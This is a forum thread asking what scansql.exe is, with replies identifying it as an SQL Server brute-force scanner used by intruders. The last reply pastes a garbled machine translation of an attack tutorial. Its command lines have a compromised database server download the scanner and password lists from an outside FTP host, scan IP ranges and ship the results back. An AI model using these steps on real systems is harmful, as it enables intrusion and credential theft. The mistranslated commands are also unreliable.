Results 1 to 6 of 6

Thread: Scansql.exe what is it

  1. #1
    Junior Member
    Join Date
    Jul 2004

    Scansql.exe what is it

    I am a assistant mgr of Pc help group on MSN , and one of the members has been having a problem with a program call SCANSQL.EXE. Can anyone tell me what it's used for so i can inform the said person

    Regards Drazi1

  2. #2
    0_o Mastermind keezel's Avatar
    Join Date
    Jun 2003
    I searched google and there's a tutorial on SQL hacking on governmentsecurity.org that I can't get to and it lists Scansql.exe in the description of the web page. It'd be nice if I could access governmentsecurity.org to actually take a look at the tutorial but I can't even register. Anyway, t'would seem that Scansql.exe is malware of some form. It also seems that it comes from a different country as most other sites registered with google that turned up results on "Scansql.exe" were in a foreign language that I didn't recognize. I wish I could help out more but it seems like a strange bug for someone to get.

  3. #3
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Huson Mt.
    I couldn't get to that page either, and when I translated the one page, it was a transcript of a IRC conversation that didn't really contain any usefull information. The other links my proximotron wouldn't let me reach or they came up with a 404 error.

    I'll check Security Focas for it later.
    \"Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!\"
    Author Unknown

  4. #4
    The Doctor Und3ertak3r's Avatar
    Join Date
    Apr 2002
    Did you try Google?

    Hmm My inital attempt was all french..

    Found this in a quick search of PacketStorm..

    sqlscan v1.0 is intended to run against Microsoft SQL Server and attempts to connect directly to port 1433. Features the ability to scan one host or an IP list from an input file, the ability to scan for one SQL account password or multiple passwords from a dictionary file, and the ability to create an administrative NT backdoor account on vulnerable hosts, which will fail if xp_cmdshell is disabled on the server.
    from here

    I know it isn't ScanSql.exe .. I would be asking the person if they are using ANY DATABASE applications.. it maybe good it may be bad.. a check with the software publisher of the database app will tell volumes..

    "Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr

  5. #5
    Junior Member
    Join Date
    Dec 2002
    this file is mostly used by FXP groups (hackers)...
    this file gets a list of IPs that were identified as Computers who run SQL.
    The file has a built-in list of common user names and passwords.
    What it does is scan every IP it gets and trys on them the list of user names and passwords.
    When it gets in it creates a log that informs the user about the IP and the user + pass.
    those hackers are probably using that computer as a remote computer and run thier test on it so they can find more computers that are hackable.

  6. #6
    Join Date
    Jul 2003
    Seems to be a remote scanner thingy.

    Remote Scanning of SQL::
    Remote Scanning of SQL is not different with that from the 21 (see this PAGE ). There is only script (ordering of execution given to the SQL), as well as the logs employed. In this process it is not used Tscan.exe & Kill.exe, but:
    [gloworange]ScanSQL.exe: the scanner.[/gloworange]
    SQLpass.dic: library of Password.
    Dict.txt: library of "User ".
    Put besides that and script the technique is identhic. To have a IP 21 in anonymous access and of root "to dir: ->Exemple< - ). A SQL having "FTP.exe" present top. Here how that occurs:
    (for example we will take the IP of the 21 like )
    Once the whole to give the responsability on the ftp to connect itself on the SQL via SQLExec ( here ).
    1 l' addresses SQL - 2 le name of user - 3 le pass - 4 le format which is specific to chaques SQL - 5 CMD which where the lines of orders are returned

    Here lines of orders to be returned in 5 CMD:
    open echo 21> %windir%\system32\filepage.sys
    echo to use anonymous nobody@nowhere.com > > %windir%\system32\filepage.sys
    echo get scansql.exe > > %windir%\system32\filepage.sys
    echo get sqlpass.dic > > %windir%\system32\filepage.sys
    echo get dict.txt > > %windir%\system32\filepage.sys
    echo quit > > %windir%\system32\filepage.sys
    %windir%\system32\filepage.sys type
    ftp - I - N - v - s:%windir%\system32\filepage.sys
    There will be probably error messages of the type SQL_ERROR or SQL_NO_DATA, which is normal.
    But if with standard order the "%windir%\system32\filepage.sys " nothing is posted on the principal window then it will be necessary to change Format ( 4 ), and to start again until it is good.
    SQLExec will block with order " ftp - I - N - v - s:%windir%\system32\filepage.sys " what is normal, it will be released at the end of the loading of the 21 towards the SQL of the 4 files. If all is well to pass the SQL is ready to start with scanner, but for more precautions it is imperative to check if all is there. Here orders of checks:
    to dir scansql.exe
    to dir scansql.txt
    to dir sqlpass.dic
    to dir dict.txt
    If it misses files to you starting again the procedure of transfer. If you look at the lines of orders well it all will not be necessary to remake but just what it is necessary for what it misses. Once made check again.
    If all on the SQL the line of order is here to launch the scanning:
    scansql x.x.x.x y.y.y.y 200
    " X " representing the starting IP of the scann, and " y " IP of end of scann. And 200 the number of Threads (a number of IP scannées simultaneously).
    For the recuperation of the results of Remote Scanning:
    It is préfereable to check and/or recupérer the results all the 24h approximately. For that it will be necessary for you to be connected to the SQL and to return in ( 5 ) CMD the following order to see the file of the results:
    to dir scansql.txt
    If the file scansql.txt with a size of 0, is the scann it is arrété or that it did not find a SQL. yet If the file with a size it is enough to the transferer of the SQL towards 21 in order to it recuperer. Here lines of orders:
    open echo 21> %windir%\system32\filepage.sys
    echo to use anonymous nobody@nowhere.com>>%windir%\system32\filepage.sys
    echo could scansql.txt > > %windir%\system32\filepage.sys
    echo quit > > %windir%\system32\filepage.sys
    %windir%\system32\filepage.sys type
    ftp - I - N - v - s:%windir%\system32\filepage.sys
    It should be known that Pass being in the library are those which are courament used. A fear of the lapse of memory which creates a facility.

    Sqlscan.exe is a trojan

    Hope this is what you were looking for.....

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts